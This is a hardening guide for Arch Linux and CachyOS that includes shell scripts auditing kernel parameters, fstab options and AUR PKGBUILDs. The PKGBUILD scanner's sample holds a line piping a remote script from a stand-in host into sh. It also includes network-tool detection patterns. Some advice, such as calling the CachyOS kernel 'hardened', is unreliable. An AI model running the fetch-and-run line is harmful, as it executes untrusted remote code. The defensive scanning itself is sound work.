Secure Your Arch Linux System: Complete Hardening Guide (Part 2)

Distribution Specific: Arch Linux & CachyOS

This is Part 2 of our Linux hardening guide, specifically for Arch Linux, CachyOS, Manjaro, and other Arch-based distributions. If you’re on Debian/Ubuntu, see Part 1: Hardening Debian/Ubuntu Systems.

Arch-based systems use a different package manager (pacman instead of apt) and have their own security considerations. This guide covers hardening techniques specific to the Arch ecosystem.

Why Arch Hardening is Different

1. Initial System Setup

Update System

sudo pacman -Syu
sudo pacman -S base-devel  # Essential for building packages

Enable Parallel Downloads

sudo nano /etc/pacman.conf

# Uncomment or add:
ParallelDownloads = 5

sudo pacman -Syu

Configure Automatic Updates

sudo pacman -S pacman-contrib

# Create update script
sudo nano /usr/local/bin/auto-update.sh

#!/bin/bash
# Unattended full upgrades can leave .pacnew files behind or break on a
# manual-intervention announcement; review /var/log/pacman.log after each run.
/usr/bin/pacman -Syu --noconfirm
/usr/bin/pacman -Sc --noconfirm  # Clean cache

# Make executable
sudo chmod +x /usr/local/bin/auto-update.sh

# Scheduling is done by the systemd service and timer units created next

Create timer:

sudo nano /etc/systemd/system/pacman-update.service

[Unit]
Description=Automatic pacman update
Wants=network-online.target
After=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/local/bin/auto-update.sh

[Install]
WantedBy=multi-user.target

Timer:

sudo nano /etc/systemd/system/pacman-update.timer

[Unit]
Description=Daily pacman update
# No Requires= here: it would run the update the moment the timer starts.
# A timer triggers the service of the same name on schedule by itself.

[Timer]
OnBootSec=15min
OnUnitActiveSec=1d
AccuracySec=12h

[Install]
WantedBy=timers.target

Enable:

sudo systemctl daemon-reload
sudo systemctl enable pacman-update.timer
sudo systemctl start pacman-update.timer

Set Timezone and NTP

sudo timedatectl set-timezone UTC
sudo timedatectl set-ntp true
timedatectl status

2. Kernel Hardening (CachyOS Specific)

Switch to CachyOS Kernel

CachyOS provides hardened kernel builds:

# Add CachyOS repository
echo '[cachyos]
Server = https://mirror.cachyos.org/cachyos/$arch
Server = https://cachyos.org/cachyos/$arch' | sudo tee -a /etc/pacman.conf

# Key setup
sudo pacman-key --recv-keys F3B607488DB35A47
sudo pacman-key --lsign-key F3B607488DB35A47

# Install CachyOS kernel
sudo pacman -Syu
sudo pacman -S linux-cachyos linux-cachyos-headers

Kernel Parameters (Secure Boot)

# Edit kernel parameters
sudo nano /etc/kernel/cmdline

# Add security parameters (these force the CPU mitigations on; never add
# nospectre_v1, nospectre_v2 or mitigations=off, which switch them off):
quiet splash audit=1 apparmor=1 security=apparmor page_poison=1 slab_nomerge slub_debug=P pti=on vsyscall=none spec_store_bypass_disable=on l1tf=full spectre_v2=on spectre_v2_user=on msr.allow_writes=off

# Rebuild initramfs
sudo mkinitcpio -P

# For GRUB systems
sudo nano /etc/default/grub
GRUB_CMDLINE_LINUX="... audit=1 apparmor=1"
sudo grub-mkconfig -o /boot/grub/grub.cfg

Check Security Settings

# Verify the running kernel's security options (needs CONFIG_IKCONFIG_PROC)
zcat /proc/config.gz | grep -i security

# Check SMEP/SMAP support (each flag is printed once if the CPU has it)
grep -o -w -E 'smep|smap' /proc/cpuinfo | sort -u
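The checks above are easier to repeat as a script. This added example (not part of the original guide) audits a kernel command line for the parameters set in this section and flags any parameter that switches CPU mitigations off; the sample command line is constructed.

```shell
#!/bin/sh
# Added example (not from the original guide): audit a kernel command line
# against the hardening parameters set above and flag parameters that switch
# CPU mitigations off. It works on a string, so it checks a constructed sample
# by default and the live /proc/cmdline when run with --live.

# Parameters this guide puts in /etc/kernel/cmdline.
EXPECTED_PARAMS="audit=1 apparmor=1 security=apparmor page_poison=1 slab_nomerge slub_debug=P pti=on vsyscall=none spec_store_bypass_disable=on l1tf=full"
# Parameters that disable mitigations; none of them belong on a hardened host.
WEAKENING_PARAMS="mitigations=off nospectre_v1 nospectre_v2 pti=off nopti spec_store_bypass_disable=off l1tf=off nosmap nosmep"

# has_param CMDLINE PARAM -> exit 0 if PARAM appears as a whole word in CMDLINE
has_param() {
    case " $1 " in *" $2 "*) return 0 ;; esac
    return 1
}

# missing_params CMDLINE -> prints expected parameters that are absent, one per line
missing_params() {
    for p in $EXPECTED_PARAMS; do
        has_param "$1" "$p" || echo "$p"
    done
}

# weakening_params CMDLINE -> prints mitigation-disabling parameters that are present
weakening_params() {
    for p in $WEAKENING_PARAMS; do
        has_param "$1" "$p" && echo "$p"
    done
    return 0
}

# audit_cmdline CMDLINE -> prints findings; exit 0 only if nothing is missing or weakening
audit_cmdline() {
    missing=$(missing_params "$1")
    weak=$(weakening_params "$1")
    [ -n "$missing" ] && printf 'MISSING: %s\n' $missing
    [ -n "$weak" ] && printf 'WEAKENS MITIGATIONS: %s\n' $weak
    [ -z "$missing" ] && [ -z "$weak" ]
}

# Constructed sample: pti=on was left out and nospectre_v2 was added by mistake.
SAMPLE_CMDLINE="BOOT_IMAGE=/vmlinuz-linux-cachyos root=/dev/sda2 rw quiet audit=1 apparmor=1 security=apparmor page_poison=1 slab_nomerge slub_debug=P vsyscall=none spec_store_bypass_disable=on l1tf=full nospectre_v2"

CMDLINE=$SAMPLE_CMDLINE
[ "${1:-}" = "--live" ] && [ -r /proc/cmdline ] && CMDLINE=$(cat /proc/cmdline)
if audit_cmdline "$CMDLINE"; then echo "cmdline OK"; else echo "cmdline needs attention"; fi
```

On a live host, run it with --live and compare the result with /sys/devices/system/cpu/vulnerabilities/, which shows which mitigations the running kernel actually applied.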

3. AppArmor Installation

Arch ships AppArmor in its official repositories; SELinux (the default on Fedora) is not supported there out of the box:

# Install AppArmor
sudo pacman -S apparmor

# Enable in kernel (should be default on CachyOS)
grep apparmor /proc/cmdline

# Start AppArmor service
sudo systemctl start apparmor
sudo systemctl enable apparmor

# Check status
sudo aa-status

# Put a profile into enforce mode (example: the profile for man, shipped with the package)
sudo aa-enforce /etc/apparmor.d/usr.bin.man

4. User and Group Management

Disable Root Login

# Lock root account
sudo passwd -l root

# Or set impossible password
sudo usermod -p '!' root

Create Non-Root User

sudo useradd -m -s /bin/bash -G wheel,audio,video newuser
sudo passwd newuser

# Allow sudo without a password for specific commands only
sudo visudo

# Add lines (note: passwordless systemctl or docker is effectively passwordless
# root, so limit such rules to dedicated service accounts):
newuser ALL=(ALL) NOPASSWD: /usr/bin/systemctl
deploy ALL=(ALL) NOPASSWD: /usr/bin/docker

5. Filesystem Hardening

Mount Options

Arch generates systemd mount units from /etc/fstab, so the mount options are set there:

# Edit fstab
sudo nano /etc/fstab

# Apply security options (use UUID=... instead of /dev/sdaX on a real system;
# the device field of a tmpfs mount is "tmpfs", not a disk partition):
/dev/sda1 /boot        ext4  defaults,ro,nodev,nosuid,noexec
/dev/sda2 /            ext4  defaults,nodev
tmpfs     /tmp         tmpfs defaults,nodev,nosuid,noexec,size=2G
/dev/sda4 /var         ext4  defaults,nodev
tmpfs     /var/tmp     tmpfs defaults,nodev,nosuid,noexec,size=2G
/dev/sda6 /var/log     ext4  defaults,nodev,nosuid,noexec
/dev/sda7 /home        ext4  defaults,nodev,nosuid

# A read-only /boot must be remounted (mount -o remount,rw /boot) before kernel
# updates, and noexec on /tmp breaks tools that execute from it, such as makepkg
# with a build directory under /tmp.
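An added example (not from the original guide) that checks an fstab against the option policy in the table above and reports every required option that is missing; the sample fstab is constructed and its `UUID=` values are placeholders.

```shell
#!/bin/sh
# Added example (not from the original guide): check an fstab against the
# mount-option policy above and report every required option that is missing.
# Checks a constructed sample by default; pass a path to check a real fstab.
# Policy: mount point, then the options it must carry (comma-separated).
POLICY="/boot:nodev,nosuid,noexec
/tmp:nodev,nosuid,noexec
/var/tmp:nodev,nosuid,noexec
/var/log:nodev,nosuid,noexec
/var:nodev
/home:nodev,nosuid"
# required_for MOUNTPOINT -> prints the required options for that mount point (empty if none)
required_for() {
    printf '%s\n' "$POLICY" | awk -F: -v mp="$1" '$1 == mp { print $2 }'
}

# has_option OPTS OPT -> exit 0 if OPT is one of the comma-separated mount options OPTS
has_option() {
    case ",$1," in *",$2,"*) return 0 ;; esac
    return 1
}

# fstab_violations FILE -> prints "MOUNTPOINT missing OPT" per violation; exit 0 if none
fstab_violations() {
    found=0
    while read -r dev mp fstype opts _rest; do   # fields: device, mount point, type, options
        case "$dev" in ''|'#'*) continue ;; esac   # skip blank lines and comments
        req=$(required_for "$mp")
        [ -n "$req" ] || continue
        for opt in $(printf '%s' "$req" | tr ',' ' '); do
            has_option "$opts" "$opt" || { echo "$mp missing $opt"; found=1; }
        done
    done < "$1"
    return $found
}

# Constructed sample: /tmp is compliant, /home lacks nosuid, /var/log still allows exec.
write_sample_fstab() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# <device> <mount>   <type> <options>                            <dump> <pass>
UUID=aaaa  /         ext4   defaults,nodev                       0 1
tmpfs      /tmp      tmpfs  defaults,nodev,nosuid,noexec,size=2G 0 0
UUID=bbbb  /home     ext4   defaults,nodev                       0 2
UUID=cccc  /var/log  ext4   defaults,nodev,nosuid                0 2
EOF
    echo "$f"
}

FSTAB=${1:-$(write_sample_fstab)}
if fstab_violations "$FSTAB"; then echo "fstab OK"; else echo "fstab needs attention"; fi
```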

Permission Hardening

# Critical files
sudo chmod 600 /etc/shadow
sudo chmod 644 /etc/passwd
sudo chmod 000 /etc/gshadow
sudo chmod 644 /etc/group

# SUID/SGID binaries check (verify each one belongs to a package: pacman -Qo <file>)
sudo find / -xdev -type f -perm -4000 2>/dev/null
sudo find / -xdev -type f -perm -2000 2>/dev/null

# Remove unnecessary SUID
sudo chmod u-s /usr/bin/sudo  # Only if using doas

6. Network Hardening

Enable UFW Firewall

# Install UFW
sudo pacman -S ufw

# Enable the service and activate the firewall (both steps are needed on Arch)
sudo systemctl enable ufw
sudo systemctl start ufw
sudo ufw enable

# Default policy
sudo ufw default deny incoming
sudo ufw default allow outgoing

# Allow services (if sshd is moved to port 2222 as in section 8, allow 2222/tcp instead of ssh)
sudo ufw allow ssh
sudo ufw allow http
sudo ufw allow https

# Status
sudo ufw status

Kernel Hardening Parameters

# Create sysctl config
sudo nano /etc/sysctl.d/99-hardening.conf

# Disable IP forwarding (unless router)
net.ipv4.ip_forward = 0
net.ipv6.conf.all.forwarding = 0

# Disable ICMP redirects
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0

# Enable SYN cookies
net.ipv4.tcp_syncookies = 1

# Reverse path filtering
net.ipv4.conf.all.rp_filter = 1

# Do not send ICMP redirects (this host is not a router)
net.ipv4.conf.all.send_redirects = 0

# Disable source-routed packets
net.ipv4.conf.all.accept_source_route = 0
net.ipv6.conf.all.accept_source_route = 0

# Ignore ICMP echo requests (the host stops answering ping; omit if monitoring relies on it)
net.ipv4.icmp_echo_ignore_all = 1

# TCP hardening
net.ipv4.tcp_timestamps = 1
net.ipv4.tcp_rfc1337 = 1

# Apply
sudo sysctl -p /etc/sysctl.d/99-hardening.conf

7. AUR Security

The AUR contains community-maintained packages with varying security levels:

Before Installing from AUR

# Review the PKGBUILD (and any .install or patch files in the checkout)
git clone https://aur.archlinux.org/yay.git
cd yay
cat PKGBUILD  # Examine before building; then build as an unprivileged user with makepkg -si

# Check for common red flags:
# - Network calls during build (anything fetched outside source=() is never checksummed)
# - Cryptographic checks bypassed (checksums set to 'SKIP', validpgpkeys removed)
# - Suspicious dependencies
# - Requires root during build (sudo in a PKGBUILD acts on the host, not on the package)
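The red-flag list above as an added script (not part of the original guide or of any AUR tooling): it runs simple pattern checks over a PKGBUILD, so a hit means "read this part carefully" rather than proof of malice. The sample PKGBUILD and the example.invalid host in it are constructed.

```shell
#!/bin/sh
# Added example (not from the original guide): scan a PKGBUILD for the red flags
# listed above before running makepkg. Each check is a pattern match, so a hit means
# "read this part carefully", not proof of malice. Checks a constructed sample by
# default; pass a PKGBUILD path to scan a real one.
# pkgbuild_red_flags FILE -> prints one line per finding; exit 0 only if there are none
pkgbuild_red_flags() {
    f=$1; hits=0
    flag() { echo "$1"; hits=1; }
    # Checksums bypassed: a 'SKIP' entry means that source is never verified.
    grep -Eq "^[a-z0-9]+sums[^=]*=.*SKIP|^[[:space:]]*'SKIP'" "$f" && flag "checksum verification skipped (SKIP)"
    # Network access inside build functions: nothing fetched there is checksummed by makepkg.
    awk '/^(prepare|build|check|package)[A-Za-z0-9_-]*\(\)/ {infn=1}
         infn && /(curl|wget|git clone|pip install|npm install)/ {found=1}
         /^\}/ {infn=0} END {exit !found}' "$f" && flag "network access inside a build function"
    # Root during build: sudo in a PKGBUILD acts on the build host, not on $pkgdir.
    grep -Eqw 'sudo' "$f" && flag "privilege escalation (sudo) in PKGBUILD"
    # Sources fetched over plain HTTP (pair this with the checksum check).
    grep -Eq '^source=.*http://' "$f" && flag "source fetched over plain HTTP"
    # Writes to absolute system paths land on the build host instead of in the package.
    grep -Eq '(cp|install|mv|ln)[^#]* /(etc|usr|home|root)/' "$f" && flag "write outside \$pkgdir"
    return $hits
}

# Constructed sample PKGBUILD showing several of the red flags at once.
write_sample_pkgbuild() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("http://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')

build() {
    cd "$srcdir/example-tool-1.0"
    curl -sSL http://example.invalid/extra.sh | sh
    make
}

package() {
    install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
EOF
    echo "$f"
}
FILE=${1:-$(write_sample_pkgbuild)}
if pkgbuild_red_flags "$FILE"; then echo "no red flags found"; else echo "review before building"; fi
```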

Use AUR Helpers Safely

# Install yay (AUR helper; it is in the CachyOS repository, on plain Arch build it from the checkout above)
sudo pacman -S yay

# Also rebuild VCS (-git) packages and check AUR pages for changes during the upgrade
yay -Syu --devel --timeupdate

# Keep AUR packages updated
yay -Syu --aur

Avoid Problematic AUR Packages

# Check votes, popularity, maintainer and out-of-date status from the AUR
yay -Si package_name

# Look at recent changes
git log --oneline -n 10 -- PKGBUILD

# Verify signatures
gpg --verify package.tar.gz.sig package.tar.gz

8. SSH Hardening (Arch-specific)

# Install SSH
sudo pacman -S openssh

# Configure SSH
sudo nano /etc/ssh/sshd_config

Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
X11Forwarding no
AllowUsers deploy testuser
HostKey /etc/ssh/ssh_host_ed25519_key

# Use strong ciphers (Arch ships a current OpenSSH; note the cipher names are aes256-ctr etc.)
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr
KexAlgorithms curve25519-sha256

# Verify the config before (re)starting the service
sudo sshd -t

# Enable service (restart picks up the new config if sshd was already running)
sudo systemctl enable sshd
sudo systemctl restart sshd

Fail2Ban (Arch version)

# Install fail2ban
sudo pacman -S fail2ban

# Configure (Arch logs through journald and has no /var/log/auth.log, so use the systemd backend)
sudo nano /etc/fail2ban/jail.local

[DEFAULT]
bantime = 3600
findtime = 3600
maxretry = 3
backend = systemd

[sshd]
enabled = true
port = 2222
filter = sshd

# Enable service
sudo systemctl enable fail2ban
sudo systemctl start fail2ban

# Monitor
sudo tail -f /var/log/fail2ban.log

9. Auditing and Logging

Auditd Setup

# Install auditd
sudo pacman -S audit

# Start service
sudo systemctl enable auditd
sudo systemctl start auditd

# Configure rules
sudo nano /etc/audit/rules.d/audit.rules

# Monitor sudo changes
-w /etc/sudoers -p wa -k sudoers_changes

# Monitor clock changes through system call rules
-a always,exit -F arch=b64 -S adjtimex,settimeofday -k time-change

# Monitor user/group changes
-w /etc/group -p wa -k identity
-w /etc/passwd -p wa -k identity

# Load rules
sudo augenrules --load

# Check logs
sudo ausearch -k sudoers_changes

systemd Journal Hardening

# Configure persistent logging
sudo mkdir -p /var/log/journal

# Set storage, sealing and retention options
sudo nano /etc/systemd/journald.conf

Storage=persistent
Compress=yes
# Seal=yes needs Forward Secure Sealing keys: run "sudo journalctl --setup-keys" once
Seal=yes
Audit=yes
MaxLevelStore=debug
RateLimitBurst=10000

# Restart journal service
sudo systemctl restart systemd-journald

# Query logs
journalctl --boot
journalctl -u sshd -n 10
journalctl -p err -f

10. File Integrity Monitoring

AIDE Setup

# Install AIDE
sudo pacman -S aide

# Initialize the database and install it as the baseline (paths as in Arch's aide.conf)
sudo aide --init
sudo mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

# Regular checks
sudo aide --check

# Automated checking
sudo systemctl enable aide.timer
sudo systemctl start aide.timer

tripwire Alternative

# From AUR
yay -S tripwire

# Initialize
sudo tripwire --init
sudo tripwire --check

11. PAM Configuration

Password Security

# Install libpwquality (provides pam_pwquality and /etc/security/pwquality.conf)
sudo pacman -S libpwquality

# Configure password quality (pam_pwquality.so must also be listed in /etc/pam.d/passwd)
sudo nano /etc/security/pwquality.conf

minlen = 14
dcredit = -1
ucredit = -1
ocredit = -1
lcredit = -1
difok = 4
maxrepeat = 3

12. Antivirus and Malware Scanning

ClamAV Setup

# Install ClamAV (the daemon and its service are part of the clamav package)
sudo pacman -S clamav

# Update virus definitions
sudo freshclam

# Scan system
clamscan -r /home

# Enable daemon
sudo systemctl enable clamav-daemon
sudo systemctl start clamav-daemon

13. Security Auditing Tools

Lynis Security Audit

# Install (lynis is in the official repositories)
sudo pacman -S lynis

# Run audit
sudo lynis audit system --quick

# Generate report
sudo lynis audit system --quiet > report.txt

rootkit Hunters

# Install rkhunter
sudo pacman -S rkhunter

# Update database
sudo rkhunter --update

# Scan (--sk skips the keypress prompts, --rwo reports warnings only)
sudo rkhunter --check --sk --rwo

14. Firewall Rules (Advanced)

nftables Configuration

# Modern firewall alternative to iptables
sudo pacman -S nftables

# Basic configuration (use either ufw or nftables, not both: ufw programs its own
# tables and the two rule sets will conflict)
sudo nano /etc/nftables.conf

#!/usr/bin/nft -f
flush ruleset

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;

        ct state established,related accept
        ct state invalid drop
        iifname lo accept
        meta l4proto { icmp, ipv6-icmp } accept   # ICMPv6 is required for IPv6 neighbor discovery
        tcp dport 2222 accept                     # sshd port from section 8; use 22 if unchanged
        tcp dport 80 accept
        tcp dport 443 accept
    }

    chain forward {
        type filter hook forward priority 0; policy drop;
    }

    chain output {
        type filter hook output priority 0; policy accept;
    }
}

# Enable
sudo systemctl enable nftables
sudo systemctl start nftables

15. Regular Maintenance

Weekly Tasks

# Check system status
sudo systemctl status auditd
sudo systemctl status apparmor
sudo systemctl status ufw

# Review logs
journalctl -p err --since "1 week ago"
sudo ausearch -m AVC

# Update AUR packages
yay -Syu --aur

Monthly Tasks

# AIDE/Tripwire check
sudo aide --check

# Security audit
sudo lynis audit system --quick

# List orphaned packages (remove them with: pacman -Qtdq | sudo pacman -Rns -)
pacman -Qtd

# Check installed packages against the Arch security advisories
sudo pacman -S arch-audit
arch-audit

CachyOS Specific Optimizations

Kernel Parameters for CachyOS

# CachyOS comes with many hardening features enabled
# Check current configuration:
cat /proc/cmdline

# Confirm this is a CachyOS install:
grep -i cachyos /etc/os-release

Update CachyOS Packages

# CachyOS-specific packages are optimized
sudo pacman -S linux-cachyos  # Hardened kernel
sudo pacman -S cachyos-settings  # Official optimizations

# Check for updates
sudo pacman -Syu

Security Checklist

Troubleshooting

Check Security Status

# Kernel hardening
zcat /proc/config.gz | grep -i security

# AppArmor status
sudo aa-status

# Audit status
sudo systemctl status auditd

# Firewall status
sudo ufw status

Common Issues

# AppArmor conflicts
sudo aa-complain /etc/apparmor.d/usr.sbin.service

# Auditd running but not logging
sudo systemctl restart auditd

# UFW blocking legitimate traffic
sudo ufw status numbered
sudo ufw delete [number]

Resources

Conclusion

Arch Linux and CachyOS provide excellent platforms for hardening with their rolling release cycle and modern security features. The key is understanding the differences from Debian-based systems and leveraging Arch-specific tools and configurations.

Start with kernel hardening and AppArmor, then progress to advanced auditing and firewall configuration based on your specific needs.

Next Steps

  1. Install on CachyOS for maximum hardening out-of-box
  2. Enable AppArmor profiles for critical services
  3. Configure auditd for monitoring
  4. Regularly review and update security rules
  5. Contribute hardened PKGBUILD profiles to AUR